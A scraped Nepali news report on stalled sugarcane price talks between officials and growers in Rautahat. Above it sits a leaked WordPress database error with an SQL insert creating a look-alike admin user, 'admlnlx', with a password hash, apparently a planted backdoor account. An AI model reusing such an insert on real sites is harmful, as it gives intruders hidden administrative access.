WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKREj1Dr1HOckPd/13/VtTHNfsqcQV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:09:39', '', 'admlnlx', 'admlnlx')
रौतहट,पुस ८ –
उखुको मूल्य निर्धारण गर्न सरकारी पक्ष र सरोकारवालाबीच भएको वार्ता निष्कर्षमा पुग्न सकेन ।शुक्रवार उद्योग मन्त्रालयमा भएको वार्ता विनानिष्कर्ष टुंगिएपछि मन्त्रिपरिषद् बैठकले नै उखुको मूल्य निर्धारण गर्ने वार्तामा सहभागी सरकारी टोलीका प्रमुख उद्योग राज्यमन्त्री कञ्चनचन्द्र बादे श्रेष्ठले बताए ।
वार्तामा सरकारी तर्फबाट उद्योग राज्यमन्त्री कञ्चनचन्द्रसँगै उद्योग सचिव शंकर कोइराला र कृषि सचिव सहभागी थिए भने व्यवसायीका तर्फबाट उखु उत्पादक महासंघका अध्यक्ष कपिलमुनी मैनालीसँगै बारा, रौतहट, सर्लाही र महोत्तरीका उखु उत्पादक संघका अध्यक्षहरु सहभागी थिए ।
उखु उत्पादक महासंघले उखुको मूल्य ५ सय ५६ रुपैयाँ हुनुपर्ने माग राखेका छन् । तर उद्योगीहरुले ५ सय १३ रुपैयाँ प्रतिक्वीन्टलभन्दा बढी नदिने अडान लिएपछि बैठक विनानिष्कर्ष टुंगिएको महासंघका अध्यक्ष मैनालीले बताए ।
उखु उत्पादक महासंघका अध्यक्ष मैनालीले सीमावर्ती भारतीय क्षेत्रका सुगर मिल्सहरुमा उन्नत जात र कमसल जातका उखुको मूल्य फरक-फरक भएकाले चिनी सस्तो पाइने गरेको तर नेपालमा भने उखुको दर सस्तो भए पनि चिनी महङ्गो भएकोले किसान बढी मर्कामा परेको बताए ।